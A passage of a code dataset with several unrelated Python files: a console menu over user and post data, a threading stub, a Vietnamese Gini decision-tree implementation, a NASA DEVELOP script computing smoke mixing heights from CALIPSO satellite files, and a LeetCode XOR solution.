Вивести URL рандомної картинки\n\"\"\"\n\nfrom url_requests import get_requests_id, get_requests_user_info_by_id, get_requests_post_by_post_id, \\\n get_requests_post_by_user_id, \\\n get_requests_post_comments_by_post_id, get_requests_todos_by_user_id, get_requests_random_photo\n\n\ndef get_users_list():\n print(\"*\" * 30)\n print(f\" id name nikname\")\n print(\"*\" * 30)\n\n for i in get_requests_id():\n print(f'{i[\"id\"]:3} {str(i[\"name\"]).split()[0]:10} {i[\"username\"]}.')\n print(\"*\" * 30)\n\n\ndef get_short_user_info_by_id(user_id):\n for i in get_requests_user_info_by_id(user_id):\n return f'id: {i[\"id\"]},\\n' \\\n f'name: {i[\"name\"]},\\n' \\\n f'username: {i[\"username\"]}\\n'\n\n\ndef full_inf_user(user_id):\n pars: str = None\n\n for i in get_requests_user_info_by_id(user_id):\n pars = f'id user: {i[\"id\"]}\\n' \\\n f'name: {i[\"name\"]}\\n' \\\n f'nikname: {i[\"username\"]}\\n' \\\n f'email: {i[\"email\"]}\\n' \\\n f'
\\n' \\\n f'street: {i[\"address\"][\"street\"]}\\n' \\\n f'suite: {i[\"address\"][\"suite\"]}\\n' \\\n f'city: {i[\"address\"][\"city\"]}\\n' \\\n f'zipcode: {i[\"address\"][\"zipcode\"]}\\n' \\\n f'\\n' \\\n f'latitude: {i[\"address\"][\"geo\"][\"lat\"]}\\n' \\\n f'longitude: {i[\"address\"][\"geo\"][\"lng\"]}\\n' \\\n f'phone: {i[\"phone\"]}\\n' \\\n f'website: {i[\"website\"]}\\n' \\\n f'\\n' \\\n f'name: {i[\"company\"][\"name\"]}\\n' \\\n f'catchPhrase: {i[\"company\"][\"catchPhrase\"]}\\n' \\\n f'bs: {i[\"company\"][\"bs\"]}'\n\n print(pars)\n\n\ndef get_post_user(user_id):\n pars: str = None\n\n for i in get_requests_post_by_user_id(user_id):\n pars = f'Post ID: {i[\"id\"]}, title: {i[\"title\"]}'\n print(pars)\n\n\ndef get_user_post_id_range(user_id):\n post_id_list: list = []\n\n for i in get_requests_post_by_user_id(user_id):\n post_id_list.append(i[\"id\"])\n\n return int(min(post_id_list)), int(max(post_id_list))\n\n\ndef get_post_info_by_post_id(post_id):\n pars: str = None\n comment_id_list: list = []\n comments_list: dict = get_requests_post_comments_by_post_id(post_id)\n comments_num: int = len(comments_list)\n\n for i in comments_list:\n comment_id_list.append(i[\"id\"])\n\n for i in get_requests_post_by_post_id(post_id):\n pars = f'Post ID: {i[\"id\"]},\\n' \\\n f'title: {i[\"title\"]},\\n' \\\n f'{\">\" * 30}\\n' \\\n f'body: {i[\"body\"]},\\n' \\\n f'{\">\" * 30}\\n' \\\n f'comments num: {comments_num},\\n' \\\n f'comments list: {comment_id_list}'\n\n print(pars)\n\n\ndef get_todos(user_id, is_arg=True):\n if is_arg == False:\n print(\"*\" * 50)\n print(\"list of non-specific tasks: \")\n for i in get_requests_todos_by_user_id(user_id, False):\n pars = f'id: {i[\"id\"]}, title: {i[\"title\"]}'\n print(pars)\n\n elif is_arg == True:\n print(\"*\" * 50)\n print(\"list of tasks: \")\n for i in get_requests_todos_by_user_id(user_id):\n pars = f'id: {i[\"id\"]}, title: {i[\"title\"]}'\n print(pars)\n\n\ndef consol_menu():\n while True:\n try:\n if input(\"Want to continue y/n -> \").lower() == \"y\":\n get_users_list()\n in_id = input(\"enter the number id -> \")\n if int(in_id) in range(len(get_requests_id()) + 1):\n get_short_user_info_by_id(in_id)\n\n else:\n print(f\"<< incorrect id - > {in_id} >>\")\n continue\n\n else:\n exit()\n\n while True:\n print(\"*\" * 50)\n in_namb = input(\"1. Information about user\\n\"\n \"2. Post.\\n\"\n \"3. Todos\\n\"\n \"4. Enter URL of a random image\\n\"\n \"5. 
Back to menu.\\n\"\n \"choose -> \")\n\n print(\"*\" * 30)\n if int(in_namb) == 1:\n full_inf_user(in_id)\n\n elif int(in_namb) == 2:\n min_id, max_id = get_user_post_id_range(in_id)\n print(\"-----transcript of posts of koristuvach-----\")\n get_post_user(in_id)\n\n while True:\n try:\n print(\"-----if you want to return to the menu, click y/n.-----\")\n in_post_id = input(\"enter ID number to view -> \")\n if in_post_id.lower() == \"y\":\n consol_menu()\n\n elif in_post_id.lower() == \"n\":\n continue\n\n # else:\n # print(f\"entered incorrect y/n- > {in_post_id}\")\n\n if int(in_post_id) in range(min_id, max_id + 1):\n print(\"-----information about a specific post-----\")\n get_post_info_by_post_id(in_post_id)\n\n else:\n print(f\"entered incorrect Post ID - > {in_post_id}\")\n\n except Exception as err:\n print(f\"error -> {err}\")\n\n elif int(in_namb) == 3:\n get_todos(in_id, False)\n get_todos(in_id)\n\n elif int(in_namb) == 4:\n print(\"random url:\")\n get_requests_random_photo()\n\n elif int(in_namb) == 5:\n consol_menu()\n\n except Exception as err:\n print(f\"incorrect input -> {err}\")\n\n\nif __name__ in \"__main__\":\n consol_menu()\n","repo_name":"EduardKurbanov/HT_11","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":6968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"12765514930","text":"import _thread\nimport time\n\ndef print_time( threadName, delay):\n count = 0\n while count < 5:\n time.sleep(delay)\n count += 1\n print (\"%s: %s\" % ( threadName, time.ctime(time.time()) ))\n\n# Create two threads as follows\n","repo_name":"dorbenzvi/asos-price-check","sub_path":"pricecheck/checkForDrop.py","file_name":"checkForDrop.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"26325355706","text":"import collections\nfrom math import pow\nimport operator\n\n\n#tạo dữ liệu đầu vào\ndef create_dataset():\n dataset = [['nam', '0', 'rẻ', 'thấp', 'bus'],\n ['nam', '1', 'rẻ', 'trung bình', 'bus'],\n ['nữ', '0', 'rẻ', 'thấp', 'bus'],\n ['nam', '1', 'rẻ', 'trung bình', 'bus'],\n ['nữ', '1', 'đắt', 'cao', 'oto'],\n ['nam', '2', 'đắt', 'trung bình', 'oto'],\n ['nữ', '2', 'đắt', 'cao', 'oto'],\n ['nữ', '1', 'rẻ', 'trung bình', 'tàu'],\n ['nam', '0', 'tiêu chuẩn', 'trung bình', 'tàu']]\n\n labels = ['giới tính', 'sở hữu mấy xe', 'chi phí', 'mức thu nhập', 'loại xe']\n\n labels_full = {}\n\n for i in range(len(labels)):\n label_list = [example[i] for example in dataset] # Đếm các dữ liệu chuẩn đầu ra\n unique_label = set(label_list) # chia kết quả nó ra thành mảng ko trùng lặp\n labels_full[labels[i]] = unique_label #tổng quát tất cả mảng chia nó ra\n\n return dataset, labels, labels_full\n\n#Tính phần hệ số gini\ndef calc_gini_index(dataset):\n num_entries = len(dataset) # đếm số dữ liệu đầu vào\n label_counts = collections.defaultdict(int) # đếm số dữ liệu đầu vào những tách độ giống nhau\n\n for feature_vec in dataset:\n current_label = feature_vec[-1] #dữ liệu cuối cùng của kết quả\n label_counts[current_label] += 1 #đếm dữ liệu cuối cùng\n\n gini_index = 1.0\n\n for key in label_counts:\n prob = float(label_counts[key]) / num_entries #Tính tỉ lệ của từng phần trong dữ liệu\n gini_index -= pow(prob, 2)\n\n return gini_index\n\n#tính phần hệ số gini\ndef calc_delta_gini(dataset, feature_list, i, base_gini):\n unique_values = set(feature_list) # Lấy dữ liệu đầu vào đầu tiên\n new_gini = 1.0\n\n for 
value in unique_values:\n sub_dataset = split_dataset(dataset=dataset, axis=i, value=value) # cắt phần dữ liệu chia nó thành 4 mảng\n prob = len(sub_dataset) / float(len(dataset)) # tỉ lệ của số lượng dữ liệu chia mảng với tổng số lượng data\n new_gini -= prob * calc_gini_index(sub_dataset)\n\n delta_gini = base_gini - new_gini\n\n return delta_gini\n\n\n\n\n\n#tính phần hệ số gini với mỗi thuộc tính\ndef calc_gini_gain_for_series(dataset, i, base_gini):\n best_delta_gini = 0.0\n best_split_point = -1\n\n feature_list = [example[i] for example in dataset] # Lấy dữ liệu đầu tiên của cột data\n class_list = [example[-1] for example in dataset] # Lấy dữ liệu cuối của cột data\n dict_list = dict(zip(feature_list, class_list)) #Thêm nó vào dạng thư viện\n\n sorted_feature_list = sorted(dict_list.items(), key=operator.itemgetter(0)) #Cho vào trong các tập\n num_feature_list = len(sorted_feature_list) # đếm số lượng các tập\n split_point_list = [round((sorted_feature_list[i][0] + sorted_feature_list[i + 1][0]) / 2.0, 3) for i in\n range(num_feature_list - 1)]\n\n # tính toán mức tăng thông tin của mỗi điểm phân chia\n for split_point in split_point_list:\n elt_dataset, gt_dataset = split_dataset_for_series(dataset, i, split_point)\n #Tính số lượng của từng tệp đã nhận\n new_gini = len(elt_dataset) / len(sorted_feature_list) * calc_gini_index(elt_dataset) \\\n + len(gt_dataset) / len(sorted_feature_list) * calc_gini_index(gt_dataset)\n\n delta_gini = base_gini - new_gini\n if delta_gini < best_delta_gini:\n best_split_point = split_point\n best_delta_gini = delta_gini\n\n return best_delta_gini, best_split_point\n\n\n\n\n#chọn ra hàm tối ưu\ndef choose_best_feature_to_split(dataset):\n num_features = len(dataset[0]) - 1\n base_gini = calc_gini_index(dataset)\n best_delta_gini = 1.0\n best_feature = -1\n flag_series = 0\n best_split_point = 0.0\n new_split_point = 0.0\n\n for i in range(num_features):\n feature_list = [example[i] for example in dataset] #Lấy dữ liệu của phần 3\n if isinstance(feature_list[0], str):\n delta_gini = calc_delta_gini(dataset, feature_list, i, base_gini)\n else:\n delta_gini, new_split_point = calc_gini_gain_for_series(dataset, i, base_gini)\n\n if delta_gini < best_delta_gini:\n best_delta_gini = delta_gini\n best_feature = i\n flag_series = 0\n\n if not isinstance(dataset[0][best_feature], str):\n flag_series = 1\n best_split_point = new_split_point\n\n if flag_series:\n return best_feature, best_split_point\n else:\n return best_feature\n\n\n\n# cắt các dữ liệu theo cột\ndef split_dataset_for_series(dataset, axis, value):\n elt_dataset = []\n gt_dataset = []\n\n for feature in dataset:\n if feature[axis] <= value:\n elt_dataset.append(feature)\n else:\n gt_dataset.append(feature)\n\n return elt_dataset, gt_dataset\n\n# cắt dữ liệu theo data\ndef split_dataset(dataset, axis, value):\n ret_dataset = []\n\n for feature_vec in dataset:\n if feature_vec[axis] == value:\n reduced_vec = feature_vec[:axis]\n reduced_vec.extend(feature_vec[axis + 1:])\n ret_dataset.append(reduced_vec)\n\n return ret_dataset\n\n\n#tìm ra nhánh chính\ndef majority_count(class_list):\n class_count = collections.defaultdict(int)\n\n for vote in class_list:\n class_count[vote] += 1\n\n sorted_class_count = sorted(class_count.items(), key=operator.itemgetter(1), reverse=True)\n\n return sorted_class_count[0][0]\n\n\n\n#tạo ra cây\ndef create_tree(dataset, labels):\n class_list = [example[-1] for example in dataset]\n\n if class_list.count(class_list[0]) == len(class_list):\n return class_list[0]\n # 
Nếu cây chỉ có 1 nhánh duy nhất\n if len(dataset[0]) == 1:\n return majority_count(class_list)\n\n best_feature = choose_best_feature_to_split(dataset=dataset)\n\n split_point = 0.0\n\n # Nếu nó là mức tối ưu nhất thì cứ tiếp tục\n if isinstance(best_feature, tuple):\n best_feature_label = str(labels[best_feature[0]]) + '<' + str(best_feature[1])\n split_point = best_feature[1]\n best_feature = best_feature[0]\n flag_series = 1\n else:\n best_feature_label = labels[best_feature]\n flag_series = 0\n\n my_tree = {best_feature_label: {}}\n\n feature_values = [example[best_feature] for example in dataset]\n\n # Xử lí giá trị liên tục\n if flag_series:\n elt_dataset, gt_dataset = split_dataset_for_series(dataset, best_feature, split_point)\n sub_labels = labels[:]\n sub_tree = create_tree(elt_dataset, sub_labels)\n my_tree[best_feature_label]['<'] = sub_tree\n\n sub_tree = create_tree(gt_dataset, sub_labels)\n my_tree[best_feature_label]['>'] = sub_tree\n\n return my_tree\n\n # Xử lí giá trị rời rạc\n else:\n del (labels[best_feature])\n unique_values = set(feature_values)\n for value in unique_values:\n sub_labels = labels[:]\n sub_tree = create_tree(split_dataset(dataset=dataset, axis=best_feature, value=value), sub_labels)\n my_tree[best_feature_label][value] = sub_tree\n return my_tree\n\n\n\n#giải phần cần tìm trong đầu tìm\ndef classify(input_tree, feature_labels, feature_label_properties, test_vec):\n first_str = list(input_tree.keys())[0]\n first_label = first_str\n less_index = str(first_str).find('<')\n # print(less_index)\n if less_index > -1: # Nếu nó là 1 tính năng liên tục\n first_label = str(first_str)[:less_index]\n # print(\"first_label\", first_label)\n second_dict = input_tree[first_str]\n feature_index = feature_labels.index(first_label) # Các tính năng ứng với các node\n # print(second_dict)\n class_label = None\n for key in second_dict.keys(): # Vòng lặp cho mỗi nhánh\n if feature_label_properties[feature_index] == 0: # Các tính năng rời rạc\n if test_vec[feature_index] == key: # Các mẫu thử nghiệm tính năng rời rạc nhập vào 1 nhánh\n if type(second_dict[key]).__name__ == 'dict': # Nhánh không phải node lá thì đệ quy\n class_label = classify(second_dict[key], feature_labels, feature_label_properties, test_vec)\n else: # Nếu là node lá thì trả về kết quả\n class_label = second_dict[key]\n else:\n split_point = float(str(first_str)[less_index + 1:])\n if test_vec[feature_index] < split_point: # Nhập cây con phía bên trái\n if type(second_dict['<']).__name__ == 'dict': # Nhánh không phải node lá thì đệ quy\n class_label = classify(second_dict['<'], feature_labels, feature_label_properties, test_vec)\n else: # Nếu là node thì trả về kết quả\n class_label = second_dict['<']\n else:\n if type(second_dict['>']).__name__ == 'dict': # Nhánh không phải node lá thì đệ quy\n class_label = classify(second_dict['>'], feature_labels, feature_label_properties, test_vec)\n else: # Nếu là lá thì trả về kết quả\n class_label = second_dict['>']\n\n return class_label\n","repo_name":"huyhoang20/id3","sub_path":"trees.py","file_name":"trees.py","file_ext":"py","file_size_in_byte":9657,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"28691998949","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Automated Satellite Mixing height Observations and Known Remote Estimations (A-SMOKRE)\n# \n# __Fall 2020 Authors/Collaborators:__ Ashwini Badgujar, Sean Cusick, Patrick Giltz, Ella Griffith, Brandy Nisbet-Wilcox, Dr. Kenton Ross, Dr. 
Travis Toth, Keith Weber \n# \n# __Spring 2021 Authors/Collaborators:__ Jukes Liu, Lauren Mock, Dean Berkowitz, Chris Wright, Brandy Nisbet-Wilcox, Dr. Kenton Ross, Dr. Travis Toth, Keith Weber \n# \n# __Description:__ Mixing height is critical to decision making regarding air quality forecasting as it indicates the altitude at which smoke disperses. This code allows the user to input hdf files containing vertical feature masked data from CALIPSO and receive a numeric output of the observed mixing heights. This code extracts features of relevance from the hdf file to find continuous aerosols relative to the earth’s surface. The altitude at which the aerosol ends is recorded as the mixing height, along with a matching latitude and longitude. The numeric output will include a mixing height observation at a particular location. These values can be applied as per the end user’s individual needs. \n# \n# __Functions:__ \n# - Computes mixing height values for a given CALIPSO hdf file.\n# - Plots graphs to visualize the location of aerosol, surface and attenuated data\n# - Saves the calculated mixing height values to a CSV file which gets stored at the specified location\n# \n# __Parameters:__\n# \n# In:\n# \n# - desired dates of analysis (matching_CALIPSO_transect_names.csv)\n# - latitudes of desired transects with dates (calipso_transects.csv)\n# - CALIPSO files for the corresponding dates. \n# \n# Out:\n# \n# - CSV files with the mixing height values with respective latitude and longitude (CSV file stored in specified directory, see MH_calc)\n# - Plot showing the location of the features considered (aerosol, surface/subsurface, attenuated data, clear air)\n\n# In[128]:\n\n\n# Importing all the required packages\nimport os\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom scipy.interpolate import splev,splrep\nimport sys\nimport pandas as pd\nfrom pyhdf.SD import SD, SDC\n\n# Initializing variables\nos.environ[\"QT_DEVICE_PIXEL_RATIO\"] = \"0\"\nos.environ[\"QT_AUTO_SCREEN_SCALE_FACTOR\"] = \"1\"\nos.environ[\"QT_SCREEN_SCALE_FACTORS\"] = \"1\"\nos.environ[\"QT_SCALE_FACTOR\"] = \"1\"\n\n\n# ### Reclassify, Mesh, Calculate Mixing Heights\n\n# In[129]:\n\n\ndef MH_calc(feature_type2, aerosol_class2,filedate,roi_profiles, lat2, lon2, automated):\n\n # 1st dimension (rows) in the feature_type2 array : columns in figure (-1 = last column)\n # 2nd dimension (columns) in the feature_type2 array : rows in figure (-1 = last row)\n \n\n\n # Assigning numeric values to the features \n feature_type2[feature_type2 < 3], aerosol_class2[aerosol_class2 < 2] = 0,0 # other feature_type, not determined (AND MARINE)\n feature_type2[feature_type2 == 3], aerosol_class2[aerosol_class2 == 6] = 1,6 # tropospheric aerosol, smoke\n feature_type2[feature_type2 == 4], aerosol_class2[aerosol_class2 == 5] = 0,5 # other feature_type, polluted dust\n feature_type2[feature_type2 == 5], aerosol_class2[aerosol_class2 ==2] = 2,2 # surface, dust\n feature_type2[feature_type2 == 6], aerosol_class2[(aerosol_class2 > 2) & (aerosol_class2 < 5)] = 2, 3 # subsurface, continental\n feature_type2[feature_type2 == 7], aerosol_class2[(aerosol_class2 == 7)] = 3,7 # bad feature_type, other\n \n print(\"number of chunks identified as smoke aerosol\")\n print(len(aerosol_class2[(feature_type2 == 1)& (aerosol_class2 == 6)]))\n\n\n\n\n # Generate altitude feature_type according to file specification [1].\n alt = np.zeros(290) # change to altitude_levels variable\n type(alt)\n\n\n # Generating altitude data\n \n 
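# Editor's note (hedged): the 290 bins built below, at 0.03 km spacing
# starting from -0.5 km, span -0.5 km to ~8.17 km -- consistent with the
# low-altitude portion of the CALIPSO VFM grid. An equivalent vectorized
# construction producing the same values as the loop that follows:
#
#     alt = -0.5 + 0.03 * np.arange(290)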
for i in range (0, 290):\n alt[i] = -0.5 + i*0.03\n\n\n\n # Contouring the feature_type on a grid of latitude vs. pressure\n latitude, altitude = np.meshgrid(lat2, alt)\n #print(altitude.shape)\n #print(latitude.shape)\n \n # if not automated return values for visualization\n #print (lat2)\n #print(alt)\n if not automated: return feature_type2, aerosol_class2, lat2, alt, lon2\n\n\n # Reversing the altitude data for calculation \n altitude_reversed = alt[::-1]\n altitude_reversed\n \n \n # --------------------------------------------------------------------------------------------------\n # Calculating the mixing heights and copying them to csv\n # Main idea here: if transition from ground to air has aerosol immediately, we keep. \n # --------------------------------------------------------------------------------------------------\n\n latitude_output = []\n longitude_output = []\n altitude_output = []\n aerosol_class_output = []\n \n for profile in range(roi_profiles):\n if feature_type2[profile][-1] != 2: # checking if last value is surface/subsurface\n continue\n # loop through the vertical profile\n first_aerosol = True\n second_aerosol = True\n for alt_index in range((len(altitude_reversed)-1), 0, -1):\n if feature_type2[profile][alt_index] == 2: # check if it is surface/subsurface\n last_value = 2\n continue\n if feature_type2[profile][alt_index] == 3:\n last_value = 3\n continue\n if feature_type2[profile][alt_index] == 1: # checking if it is aerosol\n if first_aerosol:\n aerosol_bottom = altitude_reversed[alt_index] # record the aerosol bottom\n first_aerosol = False #we are no longer looking for the first aerosol\n temp_alt = altitude_reversed[alt_index]\n temp_class = aerosol_class2[profile][alt_index]\n last_value = 1\n continue\n # when we arrive at non-aerosol, non-surface, non-attenuated feature_type...\n elif (feature_type2[profile][alt_index] == 0) & (not first_aerosol):\n # if we just emerged from an aerosol cloud, store\n # if we haven't hit aerosol yet, keep going!\n \n # If this is the second aerosol cloud, delete the last aerosol and break!\n if not second_aerosol:\n del latitude_output[-1]\n del longitude_output[-1]\n del altitude_output[-1]\n del aerosol_class_output[-1]\n break\n if last_value == 1:\n aerosol_top = altitude_reversed[alt_index] # record the aerosol top\n if ((aerosol_bottom > 0.3) & (aerosol_top > 6)) | (aerosol_bottom > 4.7) | (aerosol_top-aerosol_bottom <0.15): # if lofted or < 150m thickness\n break\n latitude_output.append(lat2[profile])\n longitude_output.append(lon2[profile])\n altitude_output.append(temp_alt)\n aerosol_class_output.append(temp_class)\n value = 'latitude :' + str(lat2[profile]) + ' longitude :' + str(lon2[profile]) + ' altitude :' + str(temp_alt) + ' aerosol_class :' + str(temp_class) # add to csv\n print(value)\n first_plume_top = aerosol_top\n second_aerosol = False\n first_aerosol = True\n \n # if we've reached a cloud, whether there was aerosol or not, break. \n # this means that contiguity with the ground is ensured.\n\n\n # Converting the feature_type to Dataframe for copying to csv \n df = pd.DataFrame(\n {'Latitude': latitude_output,\n 'Longitude': longitude_output,\n 'Altitude': altitude_output,\n 'Aerosol_Type': aerosol_class_output,\n 'Date': [filedate]*len(aerosol_class_output)\n })\n df.head()\n \n print()\n if df.shape[0] == 0:\n print(\"No MH calculated for this transect. 
Causes may include: data attenuation, lack of aerosol data, other\")\n \n return\n\n # ---------------------------\n # CHANGE OUTPUT FILENAME HERE\n # ---------------------------\n \n # Copying the Dataframe to csv\n # check if a csv already exists, extend that file if so.\n # MAKE SURE THE DIRECTORY IS EMPTY PRIOR TO RUNNING!\n if os.path.exists('Z:/SIHAQII/Data/Mixing_Heights/MH_'+filedate+'.csv'):\n df.to_csv('Z:/SIHAQII/Data/ASMOKRE_MH_Old/MH_'+filedate+'.csv', mode = 'a', index = False, header = False)\n else:\n df.to_csv('Z:/SIHAQII/Data/ASMOKRE_MH_Old/MH_'+filedate+'.csv', index = False, header=True)\n \n\n\n# ### Process CALIPSO file\n\n# In[130]:\n\n\n# ---------------------------\n# CHANGE: Remove all files in directory prior to executing. \n# ---------------------------\ndef Process_CALIPSO(FILE_PATH, lat_min, lat_max,filedate, automated):\n vfm_hdf = SD(FILE_PATH, SDC.READ)\n\n # Getting the feature type from hdf file\n DATAFIELD_NAME = 'Feature_Classification_Flags' # Datafield from hdf file which has features\n feature_type2D = vfm_hdf.select(DATAFIELD_NAME)\n feature_type = np.array(feature_type2D[:,:])\n #print(feature_type)\n #print(feature_type.shape)\n\n # Reading geolocation datasets.\n latitude = vfm_hdf.select('Latitude')\n lat = np.array(latitude[:])\n\n roiNDX_initial = np.where(lat >= lat_min)[0][0] \n # We want the last of the values which is less than the max lat. \n roiNDX_final = np.where(lat <= lat_max)[0][-1]\n #print(roiNDX_initial)\n #print(roiNDX_final)\n if roiNDX_initial >= roiNDX_final: \n print(\"Error: Lat range is too small. This transect will be thrown out\")\n return\n\n # Reading geolocation feature_typesets.\n longitude = vfm_hdf.select('Longitude')\n lon = np.array(longitude[:])\n #print(lon)\n\n # # Assigning the granule blocks and profile values \n granule_blocks = lat.shape[0]\n granule_profiles = profile5km * granule_blocks\n profNDX = np.array(range(granule_profiles))\n prof2blockNDX = np.array(range(7,granule_profiles,profile5km))\n bigNDX_initial = 15 * roiNDX_initial\n bigNDX_final = 15 * roiNDX_final\n\n # # Assigning spline latitude value\n spline_latitude = splrep(prof2blockNDX, lat)\n lat2 = splev(profNDX, spline_latitude)\n #print(lat2)\n\n # #Assigning spline longitude value\n spline_longitude = splrep(prof2blockNDX, lon)\n lon2 = splev(profNDX, spline_longitude)\n #print(lon2)\n\n # # Extracting Feature Type only (1-3 bits) through bitmask.\n aerosol_class = (feature_type & 0b111000000000) >> 9 # downshift by 9 places. 
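# Editor's worked example of the bit fields above (the value is illustrative):
# with flags = 0b110_000_000_011,
#   (flags & 0b111000000000) >> 9  ->  0b110 = 6  (aerosol subtype, bits 10-12: smoke)
#   flags & 0b111                  ->  0b011 = 3  (feature type, bits 1-3: tropospheric aerosol)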
\n feature_type = feature_type & 0b111 # store 7 as binary in variable\n\n # # Considering latitude and longitude of interest\n lat = lat[roiNDX_initial:roiNDX_final]\n lat2 = lat2[bigNDX_initial:bigNDX_final]\n lon2 = lon2[bigNDX_initial:bigNDX_final]\n roi_blocks = lat.shape[0]\n roi_profiles = lat2.shape[0]\n\n # # Extracting the feature_type from the area of interest\n feature_type2d = feature_type[roiNDX_initial:roiNDX_final, 1165:] \n aerosol_class2d = aerosol_class[roiNDX_initial:roiNDX_final, 1165:]\n \n # converting it from 3d to 2d\n # reshape b/c feature_type needs to be oriented correctly\n \n # initialize array with row for each profile and column for each altitude\n ftr = np.empty((roi_profiles, altitude_levels), int)\n atr = np.empty((roi_profiles, altitude_levels), int)\n granule_blocks = roi_blocks\n \n # step through each row (CALIPSO 5km block) of VFM data\n for block in range(granule_blocks):\n # step across each row one profile at a time\n # each row has 15 profiles of 290 altitude elements each\n for profile in range(profile5km):\n # create a running index of which profile you're on\n # for the entire region of interest\n bpNDX = block*profile5km + profile\n # calculate initial and final elements to slice out elements\n # corresponding to an individual profile\n pa_i = profile*altitude_levels\n pa_f = profile*altitude_levels + altitude_levels\n # transfer data from array organized by block\n # to array organized by profile\n ftr[bpNDX,:] = feature_type2d[block,pa_i:pa_f]\n atr[bpNDX,:] = aerosol_class2d[block,pa_i:pa_f]\n \n feature_type2 = ftr\n aerosol_class2 = atr\n\n# -------------------------------------------------------------------------------------------------------------------\n# -------------------------------------------------------------------------------------------------------------------\n# -------------------------------------------------------------------------------------------------------------------\n \n # -----------------------------------------------------------------------------------------------------------\n # Move on to reclassify data, mesh grid, loop through profiles and extract MH \n # -----------------------------------------------------------------------------------------------------------\n if not automated: \n feature_type2, aerosol_class2, lat, alt, lon = MH_calc(feature_type2, aerosol_class2,filedate,roi_profiles, lat2, lon2, automated) # see function above\n return feature_type2, aerosol_class2, lat, alt, lon\n \n MH_calc(feature_type2, aerosol_class2,filedate,roi_profiles, lat2, lon2, automated) # see function above\n\n\n# ### Automated calculation of all MH plumes:\n\n# ##### Get list of matching filenames for identified CALIPSO passes\n\n# In[132]:\n\n\n# Assigning some universal values to profiles and altitudes\nprofile5km = 15\naltitude_levels = 290\n\ncsvpath = 'Z:\\SIHAQII\\Data\\input_CSVs/' # path to the folder with the csv files\noverlap_transects_df = pd.read_csv(csvpath+'calipso_transects.csv') # read in the manually identified overlap info \ntransect_dates = overlap_transects_df['Date'] # grab the dates column\n\n# Read in the matches\nmatches_df = pd.read_csv(csvpath+'matching_CALIPSO_transect_names.csv', usecols=[1], names = ['filenames'], header = 0)\nmatches = list(matches_df['filenames']) # grab the filenames as a list\nlen(matches) # number of matches\n\n\n# ##### Read in files, call functions above\n\n# In[126]:\n\n\nFILE_DIR = 'Z:/SIHAQII/Data/CALIPSO_HDF_FILES/CALIPSO_HDFs/xfr139.larc.nasa.gov/'\ncounter = 
0\nfor file in matches:\n #print(file) # print the filename\n filedate = file[30:40] # slice the string to get the date\n print(filedate)\n lat_mins = overlap_transects_df.loc[overlap_transects_df['Date'] == filedate, ['Latitude_min']] # grab the latitude mins\n lat_maxs = overlap_transects_df.loc[overlap_transects_df['Date'] == filedate, ['Latitude_max']] # grab the latitude maxs\n if len(lat_mins) > 0: # if there are matches found\n for plumen in range(0, len(lat_mins)): # loop through the latmins and latmaxs identified\n lat_minmax = [lat_mins.values[plumen][0],lat_maxs.values[plumen][0]]\n lat_min = min(lat_minmax)\n lat_max = max(lat_minmax)\n print(lat_min, lat_max)\n \n # Create filepath, call functions above\n FILE_PATH = FILE_DIR + file\n automated = True\n Process_CALIPSO(FILE_PATH, lat_min, lat_max,filedate, automated)\n counter = counter+1\nprint(\"Final number of plumes analyzed:\")\nprint(counter)\n\n\n# ### For examining just one plume:\n\n# In[139]:\n\n\n# ---------------------------------------------\n# Specify file location AND min / max latitudes\n# ---------------------------------------------\n\nFILE_DIR = 'Z:/SIHAQII/Data/Testfiles_softwarerelease/CALIPSO_test_files'\nFILE_WILD = 'CAL_LID_L2_VFM-Standard-V4-20.2006-08-16T20-29-26ZD.hdf'\nFILE_PATH= FILE_DIR + '/' + FILE_WILD\nfiledate = FILE_WILD[30:40]\n\n# # Assigning initial and final values to the latitudes\nlat_min = 48.3066\nlat_max = 48.9223\n\n# Assigning some universal values to profiles and altitudes\nprofile5km = 15\naltitude_levels = 290\n\n# letting it know to return just the one plume\nautomated = False\nfeature_type2, aerosol_class2, lat2, alt, longitude = Process_CALIPSO(FILE_PATH, lat_min, lat_max, filedate, automated)\nlatitude, altitude = np.meshgrid(lat2, alt)\n\n# only use below for diagnostics on a single plumes classifications\n#automated = True\n#Process_CALIPSO(FILE_PATH, lat_min, lat_max, filedate, automated)\n\n\n# In[140]:\n\n\nimport matplotlib\ncgfont = {'fontname': 'Century Gothic'}\nfig, ax = plt.subplots(figsize = (8,6))\ncmap = plt.get_cmap('Dark2')\nbounds = [0.,2,3.,5,6,7,8]\nticks = [1, 2.5,4,5.5,6.5,7.5]\nnorm = matplotlib.colors.BoundaryNorm(bounds, cmap.N)\na = ax.pcolor(lat2, alt, np.rot90(aerosol_class2),cmap=cmap, norm = norm, vmin=0, vmax=7)\ncbar = fig.colorbar(a, norm = norm, ticks = ticks,\n aspect = 20)\nplt.ylabel('Altitude (km AGL)',fontsize = 18, **cgfont)\nplt.xlabel('Latitude',fontsize = 18, **cgfont)\ncbar.set_ticklabels(['Und','Dust','Continental','Polluted Dust','Smoke','Other'])\n#cbar.set_title('Aerosol Type')\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"NASA-DEVELOP/MHEST","sub_path":"ASMOKRE_02.22.2021.py","file_name":"ASMOKRE_02.22.2021.py","file_ext":"py","file_size_in_byte":17572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"6455113943","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@Author: tushushu\n@Date: 2019-09-04 10:56:37\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def singleNumber(self, nums: List[int]) -> int:\n ret = 0\n for num in nums:\n print(ret)\n ret ^= num\n print(ret)\n return ret\n\n\nif __name__ == \"__main__\":\n t = Solution()\n nums = [1, 2, 3, 2, 1, 3, 4, 5, 6, 4, 6]\n t.singleNumber(nums)\n","repo_name":"Python-Z/leetcode","sub_path":"python/136. 只出现一次的数字.py","file_name":"136. 
